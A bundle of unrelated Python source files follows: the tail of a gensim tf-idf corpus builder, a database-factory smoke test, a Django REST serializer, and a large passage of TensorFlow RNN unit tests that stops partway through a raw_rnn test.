                word_list = seg_doc(content)
                file_bow = dictionary.doc2bow(word_list)
                file_tfidf = tfidf_model[file_bow]
                tmp = corpus_tfidf.get(catg, [])
                tmp.append(file_tfidf)
                if tmp.__len__() == 1:
                    corpus_tfidf[catg] = tmp
            if i % 10000 == 0:
                print('{i} files is dealed'.format(i=i))
        # persist the per-category tf-idf corpora as MatrixMarket (.mm) files
        catgs = list(corpus_tfidf.keys())
        for catg in catgs:
            corpora.MmCorpus.serialize('{f}{s}{c}.mm'.format(f=path_tmp_tfidf, s=os.sep, c=catg),corpus_tfidf.get(catg),id2word=dictionary)
            print('catg {c} has been transformed into tfidf vector'.format(c=catg))
        print('=== tfidf向量已经生成 ===')
    else:
        print('=== 检测到tfidf向量已经生成,跳过该阶段 ===')
    end = time.time()
    print('total spent times:%.2f' % (end-start)+ ' s')
|
from factory import *
if __name__ == "__main__":
    # Smoke-test the 'tsql' database returned by the factory: connect,
    # execute, disconnect, printing the result of each call.
    connect_result = DatabaseFactory.get_database('tsql').instance().connect()
    execute_result = DatabaseFactory.get_database('tsql').instance().execute()
    disconnect_result = DatabaseFactory.get_database('tsql').instance().disconnect()
    print(connect_result)
    print(execute_result)
    print(disconnect_result)
|
from rest_framework import serializers
from .models import AssetInfo
class AssetSerializer(serializers.ModelSerializer):
    """DRF model serializer exposing every field of AssetInfo."""
    class Meta:
        model = AssetInfo
        fields = '__all__'
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rnn module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import time
import timeit
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.python.util import nest
class Plus1RNNCell(tf.contrib.rnn.RNNCell):
  """RNN Cell generating (output, new_state) = (input + 1, state + 1)."""
  @property
  def output_size(self):
    # Fixed output width of 5 units.
    return 5
  @property
  def state_size(self):
    # State has the same width as the output.
    return 5
  def __call__(self, input_, state, scope=None):
    # No variables: purely arithmetic, so expected test values are exact.
    return (input_ + 1, state + 1)
class DummyMultiDimensionalLSTM(tf.contrib.rnn.RNNCell):
  """LSTM Cell generating (output, new_state) = (input + 1, state + 1).

  The input to this cell may have an arbitrary number of dimensions that follow
  the preceding 'Time' and 'Batch' dimensions.
  """
  def __init__(self, dims):
    """Initialize the Multi-dimensional LSTM cell.

    Args:
      dims: tuple that contains the dimensions of the output of the cell,
        without including 'Time' or 'Batch' dimensions.
    """
    if not isinstance(dims, tuple):
      raise TypeError("The dimensions passed to DummyMultiDimensionalLSTM"
                      "should be a tuple of ints.")
    self._dims = dims
    self._output_size = tf.TensorShape(self._dims)
    # LSTM-style state: an (h, c) pair, each shaped like the output.
    self._state_size = (tf.TensorShape(self._dims), tf.TensorShape(self._dims))
  @property
  def output_size(self):
    return self._output_size
  @property
  def state_size(self):
    return self._state_size
  def __call__(self, input_, state, scope=None):
    h, c = state
    return (input_ + 1, (h + 1, c + 1))
class NestedRNNCell(tf.contrib.rnn.RNNCell):
  """RNN Cell generating (output, new_state) = (input + 1, state + 1).

  The input, output and state of this cell is a tuple of two tensors.
  """
  @property
  def output_size(self):
    # Two output tensors, five units each.
    return (5, 5)
  @property
  def state_size(self):
    # Two state tensors, six units each (deliberately != output_size).
    return (6, 6)
  def __call__(self, input_, state, scope=None):
    h, c = state
    x, y = input_
    return ((x + 1, y + 1), (h + 1, c + 1))
class TestStateSaver(object):
  """Minimal state-saver stub: hands out zero states and records saves."""
  def __init__(self, batch_size, state_size):
    self._batch_size = batch_size
    self._state_size = state_size
    self.saved_state = {}
  def state(self, name):
    """Return a zero tensor shaped (batch_size,) + state_size for `name`."""
    if isinstance(self._state_size, dict):
      size = self._state_size[name]
    else:
      size = self._state_size
    # Normalize an int to a 1-tuple; anything but int/tuple is rejected.
    if isinstance(size, int):
      size = (size,)
    elif not isinstance(size, tuple):
      raise TypeError("state_size should either be an int or a tuple")
    return tf.zeros((self._batch_size,) + size)
  def save_state(self, name, state):
    """Record `state` under `name` and pass the tensor through unchanged."""
    self.saved_state[name] = state
    return tf.identity(state)
class RNNTest(tf.test.TestCase):
  """Argument-validation tests for tf.nn.dynamic_rnn."""
  def setUp(self):
    # Seed NumPy for reproducible random test data.
    self._seed = 23489
    np.random.seed(self._seed)
  def testInvalidSequenceLengthShape(self):
    # sequence_length must be rank-1; a nested list should be rejected.
    cell = Plus1RNNCell()
    inputs = [tf.placeholder(tf.float32, shape=(3, 4))]
    with self.assertRaisesRegexp(ValueError, "must be a vector"):
      tf.nn.dynamic_rnn(
          cell, tf.stack(inputs), dtype=tf.float32, sequence_length=[[4]])
class GRUTest(tf.test.TestCase):
  """Smoke and variable-scope tests for GRU cells under dynamic_rnn."""
  def setUp(self):
    # Seed NumPy so random inputs / sequence lengths are reproducible.
    self._seed = 23489
    np.random.seed(self._seed)
  def _testDynamic(self, use_gpu):
    # Build and run a small time-major dynamic_rnn; passes if nothing raises.
    time_steps = 8
    num_units = 3
    input_size = 5
    batch_size = 2
    input_values = np.random.randn(time_steps, batch_size, input_size)
    sequence_length = np.random.randint(0, time_steps, size=batch_size)
    with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
      concat_inputs = tf.placeholder(
          tf.float32, shape=(time_steps, batch_size, input_size))
      cell = tf.contrib.rnn.GRUCell(num_units=num_units)
      with tf.variable_scope("dynamic_scope"):
        outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
            cell, inputs=concat_inputs, sequence_length=sequence_length,
            time_major=True, dtype=tf.float32)
      feeds = {concat_inputs: input_values}
      # Initialize
      tf.global_variables_initializer().run(feed_dict=feeds)
      sess.run([outputs_dynamic, state_dynamic], feed_dict=feeds)
  def testDynamic(self):
    self._testDynamic(use_gpu=False)
    self._testDynamic(use_gpu=True)
  def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
    # Build via `factory` under a scope object (or a string prefix) and then
    # verify every created variable name lives under that prefix.
    with self.test_session(use_gpu=True, graph=tf.Graph()):
      if use_outer_scope:
        with tf.variable_scope(prefix) as scope:
          factory(scope)
      else:
        factory(prefix)
        tf.global_variables_initializer()
      # check that all the variables names starts
      # with the proper scope.
      all_vars = tf.global_variables()
      prefix = prefix or "rnn"
      scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
      tf.logging.info("RNN with scope: %s (%s)"
                      % (prefix, "scope" if use_outer_scope else "str"))
      for v in scope_vars:
        tf.logging.info(v.name)
      self.assertEqual(len(scope_vars), len(all_vars))
  def testDynamicScope(self):
    time_steps = 8
    num_units = 3
    input_size = 5
    batch_size = 2
    sequence_length = np.random.randint(0, time_steps, size=batch_size)
    def factory(scope):
      concat_inputs = tf.placeholder(
          tf.float32, shape=(time_steps, batch_size, input_size))
      cell = tf.contrib.rnn.GRUCell(num_units=num_units)
      return tf.nn.dynamic_rnn(cell, inputs=concat_inputs,
                               sequence_length=sequence_length,
                               time_major=True, dtype=tf.float32,
                               scope=scope)
    # Exercise scope-object, string-prefix, and default ("rnn") naming.
    self._testScope(factory, use_outer_scope=True)
    self._testScope(factory, use_outer_scope=False)
    self._testScope(factory, prefix=None, use_outer_scope=False)
class LSTMTest(tf.test.TestCase):
  def setUp(self):
    # Seed NumPy so random inputs below are reproducible across runs.
    self._seed = 23489
    np.random.seed(self._seed)
  def testDynamicRNNAllowsUnknownTimeDimension(self):
    # The time axis (dim 1, batch-major) may be None at graph build time.
    inputs = tf.placeholder(tf.float32, shape=[1, None, 20])
    cell = tf.contrib.rnn.GRUCell(30)
    # Smoke test, this should not raise an error
    tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)
  def testDynamicRNNWithTupleStates(self):
    """static_rnn and dynamic_rnn must agree when state_is_tuple=True."""
    num_units = 3
    input_size = 5
    batch_size = 2
    num_proj = 4
    max_length = 8
    sequence_length = [4, 6]
    with self.test_session(graph=tf.Graph()) as sess:
      initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
      inputs = max_length * [
          tf.placeholder(tf.float32, shape=(None, input_size))]
      inputs_c = tf.stack(inputs)
      cell = tf.contrib.rnn.LSTMCell(
          num_units, use_peepholes=True,
          num_proj=num_proj, initializer=initializer, state_is_tuple=True)
      with tf.variable_scope("root") as scope:
        outputs_static, state_static = tf.contrib.rnn.static_rnn(
            cell, inputs, dtype=tf.float32,
            sequence_length=sequence_length, scope=scope)
        # Reuse the same weights so both unrollings compute identical math.
        scope.reuse_variables()
        outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
            cell, inputs_c, dtype=tf.float32, time_major=True,
            sequence_length=sequence_length, scope=scope)
      # Both states must be LSTMStateTuples with (c, h) field ordering.
      self.assertTrue(isinstance(state_static, tf.contrib.rnn.LSTMStateTuple))
      self.assertTrue(isinstance(state_dynamic, tf.contrib.rnn.LSTMStateTuple))
      self.assertEqual(state_static[0], state_static.c)
      self.assertEqual(state_static[1], state_static.h)
      self.assertEqual(state_dynamic[0], state_dynamic.c)
      self.assertEqual(state_dynamic[1], state_dynamic.h)
      tf.global_variables_initializer().run()
      input_value = np.random.randn(batch_size, input_size)
      outputs_static_v = sess.run(
          outputs_static, feed_dict={inputs[0]: input_value})
      outputs_dynamic_v = sess.run(
          outputs_dynamic, feed_dict={inputs[0]: input_value})
      self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
      state_static_v = sess.run(
          state_static, feed_dict={inputs[0]: input_value})
      state_dynamic_v = sess.run(
          state_dynamic, feed_dict={inputs[0]: input_value})
      self.assertAllEqual(
          np.hstack(state_static_v), np.hstack(state_dynamic_v))
  def testDynamicRNNWithNestedTupleStates(self):
    """static_rnn and dynamic_rnn must agree for nested MultiRNNCell states."""
    num_units = 3
    input_size = 5
    batch_size = 2
    num_proj = 4
    max_length = 8
    sequence_length = [4, 6]
    with self.test_session(graph=tf.Graph()) as sess:
      initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
      inputs = max_length * [
          tf.placeholder(tf.float32, shape=(None, input_size))]
      inputs_c = tf.stack(inputs)
      def _cell(i):
        # Vary units/projection per layer so each layer's shapes differ.
        return tf.contrib.rnn.LSTMCell(
            num_units + i, use_peepholes=True,
            num_proj=num_proj + i, initializer=initializer, state_is_tuple=True)
      # This creates a state tuple which has 4 sub-tuples of length 2 each.
      cell = tf.contrib.rnn.MultiRNNCell(
          [_cell(i) for i in range(4)], state_is_tuple=True)
      self.assertEqual(len(cell.state_size), 4)
      for i in range(4):
        self.assertEqual(len(cell.state_size[i]), 2)
      test_zero = cell.zero_state(1, tf.float32)
      self.assertEqual(len(test_zero), 4)
      # zero_state must honor each layer's (c, h) sizes.
      for i in range(4):
        self.assertEqual(test_zero[i][0].get_shape()[1], cell.state_size[i][0])
        self.assertEqual(test_zero[i][1].get_shape()[1], cell.state_size[i][1])
      with tf.variable_scope("root") as scope:
        outputs_static, state_static = tf.contrib.rnn.static_rnn(
            cell, inputs, dtype=tf.float32,
            sequence_length=sequence_length, scope=scope)
        # Reuse the same weights so both unrollings compute identical math.
        scope.reuse_variables()
        outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
            cell, inputs_c, dtype=tf.float32, time_major=True,
            sequence_length=sequence_length, scope=scope)
      tf.global_variables_initializer().run()
      input_value = np.random.randn(batch_size, input_size)
      outputs_static_v = sess.run(
          outputs_static, feed_dict={inputs[0]: input_value})
      outputs_dynamic_v = sess.run(
          outputs_dynamic, feed_dict={inputs[0]: input_value})
      self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
      state_static_v = sess.run(
          nest.flatten(state_static), feed_dict={inputs[0]: input_value})
      state_dynamic_v = sess.run(
          nest.flatten(state_dynamic), feed_dict={inputs[0]: input_value})
      self.assertAllEqual(
          np.hstack(state_static_v), np.hstack(state_dynamic_v))
  def _testDynamicEquivalentToStaticRNN(self, use_gpu, use_sequence_length):
    """Checks dynamic_rnn matches static_rnn on values and all gradients.

    Builds the same LSTM twice -- once unrolled with static_rnn, once with
    dynamic_rnn -- in two separate graphs whose initializers share a seed,
    then compares forward outputs, final state, and gradients w.r.t. both
    the inputs and every trainable variable.

    Args:
      use_gpu: whether the test session may place ops on a GPU.
      use_sequence_length: if True, feed random per-batch sequence lengths;
        otherwise run all batch entries to full length.
    """
    time_steps = 8
    num_units = 3
    num_proj = 4
    input_size = 5
    batch_size = 2
    input_values = np.random.randn(time_steps, batch_size, input_size)
    if use_sequence_length:
      sequence_length = np.random.randint(0, time_steps, size=batch_size)
    else:
      sequence_length = None
    ########### Step 1: Run static graph and generate readouts
    with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
      concat_inputs = tf.placeholder(tf.float32,
                                     shape=(time_steps, batch_size, input_size))
      # static_rnn takes a Python list of per-time-step tensors.
      inputs = tf.unstack(concat_inputs)
      initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
      cell = tf.contrib.rnn.LSTMCell(
          num_units, use_peepholes=True,
          initializer=initializer, num_proj=num_proj, state_is_tuple=False)
      # Same scope name as Step 2 so variable names (and seeded initial
      # values) line up between the two graphs.
      with tf.variable_scope("dynamic_scope"):
        outputs_static, state_static = tf.contrib.rnn.static_rnn(
            cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
      feeds = {concat_inputs: input_values}
      # Initialize
      tf.global_variables_initializer().run(feed_dict=feeds)
      # Generate gradients of sum of outputs w.r.t. inputs
      static_gradients = tf.gradients(
          outputs_static + [state_static], [concat_inputs])
      # Generate gradients of individual outputs w.r.t. inputs
      static_individual_gradients = nest.flatten([
          tf.gradients(y, [concat_inputs])
          for y in [outputs_static[0],
                    outputs_static[-1],
                    state_static]])
      # Generate gradients of individual variables w.r.t. inputs
      trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
      assert len(trainable_variables) > 1, (
          "Count of trainable variables: %d" % len(trainable_variables))
      # pylint: disable=bad-builtin
      static_individual_variable_gradients = nest.flatten([
          tf.gradients(y, trainable_variables)
          for y in [outputs_static[0],
                    outputs_static[-1],
                    state_static]])
      # Test forward pass
      values_static = sess.run(outputs_static, feed_dict=feeds)
      (state_value_static,) = sess.run((state_static,), feed_dict=feeds)
      # Test gradients to inputs and variables w.r.t. outputs & final state
      static_grad_values = sess.run(static_gradients, feed_dict=feeds)
      static_individual_grad_values = sess.run(
          static_individual_gradients, feed_dict=feeds)
      static_individual_var_grad_values = sess.run(
          static_individual_variable_gradients, feed_dict=feeds)
    ########## Step 2: Run dynamic graph and generate readouts
    with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
      concat_inputs = tf.placeholder(tf.float32,
                                     shape=(time_steps, batch_size, input_size))
      inputs = tf.unstack(concat_inputs)
      initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
      cell = tf.contrib.rnn.LSTMCell(
          num_units, use_peepholes=True,
          initializer=initializer, num_proj=num_proj, state_is_tuple=False)
      with tf.variable_scope("dynamic_scope"):
        outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
            cell, inputs=concat_inputs, sequence_length=sequence_length,
            time_major=True, dtype=tf.float32)
        # Split the time-major output into per-step tensors so the readouts
        # are structurally comparable to static_rnn's list of outputs.
        split_outputs_dynamic = tf.unstack(outputs_dynamic, time_steps)
      feeds = {concat_inputs: input_values}
      # Initialize
      tf.global_variables_initializer().run(feed_dict=feeds)
      # Generate gradients of sum of outputs w.r.t. inputs
      dynamic_gradients = tf.gradients(
          split_outputs_dynamic + [state_dynamic], [concat_inputs])
      # Generate gradients of several individual outputs w.r.t. inputs
      dynamic_individual_gradients = nest.flatten([
          tf.gradients(y, [concat_inputs])
          for y in [split_outputs_dynamic[0],
                    split_outputs_dynamic[-1],
                    state_dynamic]])
      # Generate gradients of individual variables w.r.t. inputs
      trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
      assert len(trainable_variables) > 1, (
          "Count of trainable variables: %d" % len(trainable_variables))
      dynamic_individual_variable_gradients = nest.flatten([
          tf.gradients(y, trainable_variables)
          for y in [split_outputs_dynamic[0],
                    split_outputs_dynamic[-1],
                    state_dynamic]])
      # Test forward pass
      values_dynamic = sess.run(split_outputs_dynamic, feed_dict=feeds)
      (state_value_dynamic,) = sess.run(
          (state_dynamic,), feed_dict=feeds)
      # Test gradients to inputs and variables w.r.t. outputs & final state
      dynamic_grad_values = sess.run(dynamic_gradients, feed_dict=feeds)
      dynamic_individual_grad_values = sess.run(
          dynamic_individual_gradients, feed_dict=feeds)
      dynamic_individual_var_grad_values = sess.run(
          dynamic_individual_variable_gradients, feed_dict=feeds)
    ######### Step 3: Comparisons
    self.assertEqual(len(values_static), len(values_dynamic))
    for (value_static, value_dynamic) in zip(values_static, values_dynamic):
      self.assertAllEqual(value_static, value_dynamic)
    self.assertAllEqual(state_value_static, state_value_dynamic)
    self.assertAllEqual(static_grad_values, dynamic_grad_values)
    self.assertEqual(len(static_individual_grad_values),
                     len(dynamic_individual_grad_values))
    self.assertEqual(len(static_individual_var_grad_values),
                     len(dynamic_individual_var_grad_values))
    for i, (a, b) in enumerate(zip(static_individual_grad_values,
                                   dynamic_individual_grad_values)):
      tf.logging.info("Comparing individual gradients iteration %d" % i)
      self.assertAllEqual(a, b)
    for i, (a, b) in enumerate(zip(static_individual_var_grad_values,
                                   dynamic_individual_var_grad_values)):
      tf.logging.info(
          "Comparing individual variable gradients iteration %d" % i)
      self.assertAllEqual(a, b)
def testDynamicEquivalentToStaticRNN(self):
self._testDynamicEquivalentToStaticRNN(
use_gpu=False, use_sequence_length=False)
self._testDynamicEquivalentToStaticRNN(
use_gpu=True, use_sequence_length=False)
self._testDynamicEquivalentToStaticRNN(
use_gpu=False, use_sequence_length=True)
self._testDynamicEquivalentToStaticRNN(
use_gpu=True, use_sequence_length=True)
class BidirectionalRNNTest(tf.test.TestCase):
  """Tests for tf.nn.bidirectional_dynamic_rnn output symmetry and scoping."""

  def setUp(self):
    self._seed = 23489
    np.random.seed(self._seed)

  def _createBidirectionalDynamicRNN(self, use_gpu, use_shape,
                                     use_state_tuple, use_time_major,
                                     scope=None):
    """Builds a bidirectional LSTM graph and returns its key tensors.

    Both directions share the same initializer (same seed), so for suitably
    masked inputs the backward output mirrors the forward output in time.

    Returns:
      Tuple (input_value, inputs, outputs, state_fw, state_bw,
      sequence_length) where `inputs` is the list of per-step placeholders
      and `sequence_length` is an int64 placeholder.
    """
    num_units = 3
    input_size = 5
    batch_size = 2
    max_length = 8
    initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
    sequence_length = tf.placeholder(tf.int64)
    cell_fw = tf.contrib.rnn.LSTMCell(num_units,
                                      initializer=initializer,
                                      state_is_tuple=use_state_tuple)
    cell_bw = tf.contrib.rnn.LSTMCell(num_units,
                                      initializer=initializer,
                                      state_is_tuple=use_state_tuple)
    inputs = max_length * [
        tf.placeholder(tf.float32,
                       shape=(batch_size if use_shape else None, input_size))]
    inputs_c = tf.stack(inputs)
    if not use_time_major:
      # Convert time-major stack to batch-major when requested.
      inputs_c = tf.transpose(inputs_c, [1, 0, 2])
    outputs, states = tf.nn.bidirectional_dynamic_rnn(
        cell_fw,
        cell_bw,
        inputs_c,
        sequence_length,
        dtype=tf.float32,
        time_major=use_time_major,
        scope=scope)
    # Concatenate fw/bw outputs along the depth axis.
    # NOTE(review): tf.concat_v2 is the pre-TF-1.0 spelling of tf.concat.
    outputs = tf.concat_v2(outputs, 2)
    state_fw, state_bw = states
    outputs_shape = [None, max_length, 2 * num_units]
    if use_shape:
      outputs_shape[0] = batch_size
    if use_time_major:
      # Time-major output is [time, batch, depth] instead of [batch, time, depth].
      outputs_shape[0], outputs_shape[1] = outputs_shape[1], outputs_shape[0]
    self.assertEqual(
        outputs.get_shape().as_list(),
        outputs_shape)
    input_value = np.random.randn(batch_size, input_size)
    return input_value, inputs, outputs, state_fw, state_bw, sequence_length

  def _testBidirectionalDynamicRNN(self, use_gpu, use_shape,
                                   use_state_tuple, use_time_major):
    """Runs the bidirectional graph and checks fw/bw outputs mirror in time."""
    with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
      input_value, inputs, outputs, state_fw, state_bw, sequence_length = (
          self._createBidirectionalDynamicRNN(
              use_gpu, use_shape, use_state_tuple, use_time_major))
      tf.global_variables_initializer().run()
      # Run with pre-specified sequence length of 2, 3
      if use_state_tuple:
        out, c_fw, m_fw, c_bw, m_bw = sess.run(
            [outputs, state_fw[0], state_fw[1], state_bw[0], state_bw[1]],
            feed_dict={inputs[0]: input_value,
                       sequence_length: [2, 3]})
        s_fw = (c_fw, m_fw)
        s_bw = (c_bw, m_bw)
      else:
        out, s_fw, s_bw = sess.run([outputs, state_fw, state_bw],
                                   feed_dict={inputs[0]: input_value,
                                              sequence_length: [2, 3]})
      # Since the forward and backward LSTM cells were initialized with the
      # same parameters, the forward and backward output has to be the same,
      # but reversed in time. The format is output[time][batch][depth], and
      # due to depth concatenation (as num_units=3 for both RNNs):
      # - forward output:  out[][][depth] for 0 <= depth < 3
      # - backward output: out[][][depth] for 4 <= depth < 6
      #
      # First sequence in batch is length=2
      # Check that the time=0 forward output is equal to time=1 backward output
      if not use_time_major:
        # Normalize to time-major so the index math below is uniform.
        out = np.swapaxes(out, 0, 1)
      self.assertEqual(out[0][0][0], out[1][0][3])
      self.assertEqual(out[0][0][1], out[1][0][4])
      self.assertEqual(out[0][0][2], out[1][0][5])
      # Check that the time=1 forward output is equal to time=0 backward output
      self.assertEqual(out[1][0][0], out[0][0][3])
      self.assertEqual(out[1][0][1], out[0][0][4])
      self.assertEqual(out[1][0][2], out[0][0][5])
      # Second sequence in batch is length=3
      # Check that the time=0 forward output is equal to time=2 backward output
      self.assertEqual(out[0][1][0], out[2][1][3])
      self.assertEqual(out[0][1][1], out[2][1][4])
      self.assertEqual(out[0][1][2], out[2][1][5])
      # Check that the time=1 forward output is equal to time=1 backward output
      self.assertEqual(out[1][1][0], out[1][1][3])
      self.assertEqual(out[1][1][1], out[1][1][4])
      self.assertEqual(out[1][1][2], out[1][1][5])
      # Check that the time=2 forward output is equal to time=0 backward output
      self.assertEqual(out[2][1][0], out[0][1][3])
      self.assertEqual(out[2][1][1], out[0][1][4])
      self.assertEqual(out[2][1][2], out[0][1][5])
      # Via the reasoning above, the forward and backward final state should be
      # exactly the same
      self.assertAllClose(s_fw, s_bw)

  def testBidirectionalDynamicRNN(self):
    """Exercises every combination of the four boolean options."""
    # Generate 2^4 option values
    # from [True, True, True, True] to [False, False, False, False]
    options = itertools.product([True, False], repeat=4)
    for option in options:
      self._testBidirectionalDynamicRNN(use_gpu=option[0], use_shape=option[1],
                                        use_state_tuple=option[2],
                                        use_time_major=option[3])

  def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
    """Builds a graph via `factory` and checks all variables are scoped."""
    # REMARKS: factory(scope) is a function accepting a scope
    #          as an argument, such scope can be None, a string
    #          or a VariableScope instance.
    with self.test_session(use_gpu=True, graph=tf.Graph()):
      if use_outer_scope:
        with tf.variable_scope(prefix) as scope:
          factory(scope)
      else:
        factory(prefix)
      # check that all the variables names starts
      # with the proper scope.
      tf.global_variables_initializer()
      all_vars = tf.global_variables()
      # None means the library default scope name is used.
      prefix = prefix or "bidirectional_rnn"
      scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
      tf.logging.info("BiRNN with scope: %s (%s)"
                      % (prefix, "scope" if use_outer_scope else "str"))
      for v in scope_vars:
        tf.logging.info(v.name)
      # Every variable must live under the prefix.
      self.assertEqual(len(scope_vars), len(all_vars))

  def testBidirectionalDynamicRNNScope(self):
    """Scoping works for scope objects, strings, and the default name."""
    def get_factory(use_time_major):
      def factory(scope):
        return self._createBidirectionalDynamicRNN(
            use_gpu=True, use_shape=True, use_state_tuple=True,
            use_time_major=use_time_major, scope=scope)
      return factory
    self._testScope(get_factory(True), use_outer_scope=True)
    self._testScope(get_factory(True), use_outer_scope=False)
    self._testScope(get_factory(True), prefix=None, use_outer_scope=False)
    self._testScope(get_factory(False), use_outer_scope=True)
    self._testScope(get_factory(False), use_outer_scope=False)
    self._testScope(get_factory(False), prefix=None, use_outer_scope=False)
class MultiDimensionalLSTMTest(tf.test.TestCase):
  """Checks static_rnn/dynamic_rnn parity for cells with multi-dim features."""

  def setUp(self):
    self._seed = 23489
    np.random.seed(self._seed)

  def testMultiDimensionalLSTMAllRNNContainers(self):
    """static_rnn and dynamic_rnn agree for a cell whose I/O has rank > 2.

    Uses DummyMultiDimensionalLSTM, which passes inputs through unchanged,
    so the dynamic output shape must match the stacked input shape exactly.
    (Unused `inputs_using_dim` placeholders and an unused TestStateSaver
    from an earlier revision have been removed.)
    """
    feature_dims = (3, 4, 5)
    input_size = feature_dims
    batch_size = 2
    max_length = 8
    # Per-batch-entry sequence lengths (batch_size == 2).
    sequence_length = [4, 6]
    with self.test_session(graph=tf.Graph()) as sess:
      inputs = max_length * [
          tf.placeholder(tf.float32, shape=(None,) + input_size)]
      # Time-major packed version of the same placeholders for dynamic_rnn.
      inputs_c = tf.stack(inputs)
      # Create a cell for the whole test. This is fine because the cell has no
      # variables.
      cell = DummyMultiDimensionalLSTM(feature_dims)
      outputs_static, state_static = tf.contrib.rnn.static_rnn(
          cell, inputs, dtype=tf.float32,
          sequence_length=sequence_length)
      outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
          cell, inputs_c, dtype=tf.float32, time_major=True,
          sequence_length=sequence_length)
      # The dummy cell echoes its input, so shapes must match exactly.
      self.assertEqual(outputs_dynamic.get_shape().as_list(),
                       inputs_c.get_shape().as_list())
      tf.global_variables_initializer().run()
      input_total_size = (batch_size,) + input_size
      input_value = np.random.randn(*input_total_size)
      outputs_static_v = sess.run(
          outputs_static, feed_dict={inputs[0]: input_value})
      outputs_dynamic_v = sess.run(
          outputs_dynamic, feed_dict={inputs[0]: input_value})
      self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
      state_static_v = sess.run(
          state_static, feed_dict={inputs[0]: input_value})
      state_dynamic_v = sess.run(
          state_dynamic, feed_dict={inputs[0]: input_value})
      self.assertAllEqual(
          np.hstack(state_static_v), np.hstack(state_dynamic_v))
class NestedLSTMTest(tf.test.TestCase):
  """Checks static_rnn/dynamic_rnn parity for cells with nested tuple I/O."""

  def setUp(self):
    self._seed = 23489
    np.random.seed(self._seed)

  def testNestedIOLSTMAllRNNContainers(self):
    """static_rnn and dynamic_rnn agree when inputs/outputs are 2-tuples.

    (Unused `state_size`/TestStateSaver and the `inputs_using_dim`
    placeholders from an earlier revision have been removed; nothing in the
    test referenced them.)
    """
    input_size = 5
    batch_size = 2
    max_length = 8
    # Per-batch-entry sequence lengths (batch_size == 2).
    sequence_length = [4, 6]
    with self.test_session(graph=tf.Graph()) as sess:
      single_input = (tf.placeholder(tf.float32, shape=(None, input_size)),
                      tf.placeholder(tf.float32, shape=(None, input_size)))
      inputs = max_length * [single_input]
      # Pack each tuple component separately into a time-major tensor.
      inputs_c = (tf.stack([input_[0] for input_ in inputs]),
                  tf.stack([input_[1] for input_ in inputs]))
      # Create a cell for the whole test. This is fine because the cell has no
      # variables.
      cell = NestedRNNCell()
      outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
          cell, inputs_c, dtype=tf.float32, time_major=True,
          sequence_length=sequence_length)
      outputs_static, state_static = tf.contrib.rnn.static_rnn(
          cell, inputs, dtype=tf.float32,
          sequence_length=sequence_length)

      def _assert_same_shape(input1, input2, double=False):
        # Flatten nested structures and compare shapes element-wise;
        # with double=True, dim 1 of input2 must be twice input1's.
        flat_input1 = nest.flatten(input1)
        flat_input2 = nest.flatten(input2)
        for inp1, inp2 in zip(flat_input1, flat_input2):
          input_shape = inp1.get_shape().as_list()
          if double:
            input_shape[1] *= 2
          self.assertEqual(input_shape, inp2.get_shape().as_list())

      _assert_same_shape(inputs_c, outputs_dynamic)
      _assert_same_shape(inputs, outputs_static)
      tf.global_variables_initializer().run()
      input_total_size = (batch_size, input_size)
      input_value = (np.random.randn(*input_total_size),
                     np.random.randn(*input_total_size))
      outputs_dynamic_v = sess.run(
          outputs_dynamic, feed_dict={single_input: input_value})
      outputs_static_v = sess.run(
          outputs_static, feed_dict={single_input: input_value})
      # Dynamic output is time-major; transpose to batch-major for comparison.
      self.assertAllEqual(outputs_static_v,
                          np.transpose(outputs_dynamic_v, (1, 0, 2, 3)))
      state_dynamic_v = sess.run(
          state_dynamic, feed_dict={single_input: input_value})
      state_static_v = sess.run(
          state_static, feed_dict={single_input: input_value})
      self.assertAllEqual(
          np.hstack(state_static_v), np.hstack(state_dynamic_v))
class RawRNNTest(tf.test.TestCase):
  """Tests for tf.nn.raw_rnn: equivalence to dynamic_rnn, loop_state, scoping."""

  def setUp(self):
    self._seed = 23489
    np.random.seed(self._seed)

  def _testRawRNN(self, max_time):
    """Compares raw_rnn against dynamic_rnn on outputs, state, and gradients.

    Args:
      max_time: number of time steps; 0 triggers the degenerate empty-input
        path (gradients are then skipped, see NOTE below).
    """
    with self.test_session(graph=tf.Graph()) as sess:
      batch_size = 16
      input_depth = 4
      num_units = 3
      inputs = tf.placeholder(shape=(max_time, batch_size, input_depth),
                              dtype=tf.float32)
      sequence_length = tf.placeholder(shape=(batch_size,), dtype=tf.int32)
      inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
